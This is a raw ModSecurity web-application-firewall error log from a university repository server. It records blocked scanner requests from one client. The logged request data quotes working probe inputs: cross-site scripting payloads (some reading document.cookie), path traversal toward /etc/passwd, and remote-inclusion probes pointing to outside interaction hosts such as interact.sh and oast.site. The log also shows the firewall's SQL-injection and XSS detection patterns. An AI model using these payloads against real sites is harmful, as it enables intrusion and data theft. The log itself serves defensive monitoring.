{\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "repository.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAolK8MAAAAe"]
[Tue Aug 29 11:56:52.755542 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArB16EAAAAV"]
[Tue Aug 29 11:56:52.853238 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QgAAAAS"]
[Tue Aug 29 11:56:54.658503 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAArIAcYAAAAX"]
[Tue Aug 29 11:56:56.044964 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8R4AAAAS"]
[Tue Aug 29 11:56:57.719142 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8ToAAAAS"]
[Tue Aug 29 11:56:59.700512 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VkAAAAS"]
[Tue Aug 29 11:57:00.723552 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAolLAcAAAAe"]
[Tue Aug 29 11:57:01.609385 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq5@asAAAAK"]
[Tue Aug 29 11:57:01.703308 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArB19sAAAAV"]
[Tue Aug 29 11:57:02.579350 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAm80S0AAAAF"]
[Tue Aug 29 11:57:05.690214 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAnEqWkAAAAO"]
[Tue Aug 29 11:57:07.607528 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUYAAAAG"]
[Tue Aug 29 11:57:07.801728 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AoAAAAV"]
[Tue Aug 29 11:57:08.651873 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq5@dwAAAAK"]
[Tue Aug 29 11:57:08.734850 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq5@d8AAAAK"]
[Tue Aug 29 11:57:11.870519 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAnEqZUAAAAO"]
[Tue Aug 29 11:57:12.044669 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gUAAAAK"]
[Tue Aug 29 11:57:18.545339 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb08zjw7wr7jhqc7.oast.site found within TX:1: cjmnijtjmimvgniikdb08zjw7wr7jhqc7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArePHIAAAAJ"]
[Tue Aug 29 11:57:18.594906 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArLLhIAAAAb"]
[Tue Aug 29 11:57:19.546454 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAnEqcQAAAAO"]
[Tue Aug 29 11:57:23.537738 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAocyrIAAAAR"]
[Tue Aug 29 11:57:25.669409 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tcCo-f0AAArePKMAAAAJ"]
[Tue Aug 29 11:57:26.279038 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArePK0AAAAJ"]
[Tue Aug 29 11:57:27.587656 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAocyssAAAAR"]
[Tue Aug 29 11:57:30.571809 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAAnEqeYAAAAO"]
[Tue Aug 29 11:57:30.668008 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAq@sqYAAAAM"]
